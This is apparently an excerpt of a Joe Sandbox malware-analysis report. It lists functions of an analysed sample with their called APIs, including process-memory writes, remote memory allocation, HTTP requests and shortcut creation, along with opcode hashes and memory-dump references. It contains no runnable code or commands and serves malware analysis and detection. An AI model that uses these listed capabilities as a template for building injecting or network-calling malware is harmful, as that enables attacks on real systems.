                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2625713937-0
                                                                                                                                                                                                                                                            • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                                                                                                                                                            • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                                                                                                                                                                                                            Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 0041780F
                                                                                                                                                                                                                                                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                                                                                                                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 00417826
                                                                                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 00417834
                                                                                                                                                                                                                                                            • __lock.LIBCMT ref: 00417844
                                                                                                                                                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 938513278-0
                                                                                                                                                                                                                                                            • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                                                                                                                                            • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                                                                                                                                                                            Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                                                                                                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                                                                                                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                                                                                                                                                            • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2403457894-0
                                                                                                                                                                                                                                                            • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                                                                                                                                                            • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                                                                                                                                                                                            Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                                                                                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                                                                                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                                                                                                                                            • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4247068974-0
                                                                                                                                                                                                                                                            • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                                                                                                                                                            • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                                                                                                                                                                            Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: )$U$\
                                                                                                                                                                                                                                                            • API String ID: 0-3705770531
                                                                                                                                                                                                                                                            • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                                                                                                                                                            • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                                                                                                                                                                                            Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                            • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                            • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                                                                                                                                            • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                                                                                                                                                                            Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                                                                                                                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                                                                                                            • API String ID: 708495834-557222456
                                                                                                                                                                                                                                                            • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                                                                                                                                                            • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                                                                                                                                                                            Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                                                                                                                                                                              • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                                                                                                                                                                              • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                                                                                                                                                                              • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                                                                                                                                                                              • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                            • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                                                                                                                                            • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                                                                                                                                                                            Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                                                                                                            • String ID: \$]$h
                                                                                                                                                                                                                                                            • API String ID: 4104443479-3262404753
                                                                                                                                                                                                                                                            • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                                                                                                                                                            • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                                                                                                                                                                            Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                                                                                                                                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3705125965-3916222277
                                                                                                                                                                                                                                                            • Opcode ID: 0672e5a1b117dd08d43cba7aa746a28f64b2789e876d63509d475e558bd9483c
                                                                                                                                                                                                                                                            • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0672e5a1b117dd08d43cba7aa746a28f64b2789e876d63509d475e558bd9483c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                                                                                                                                                                            Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
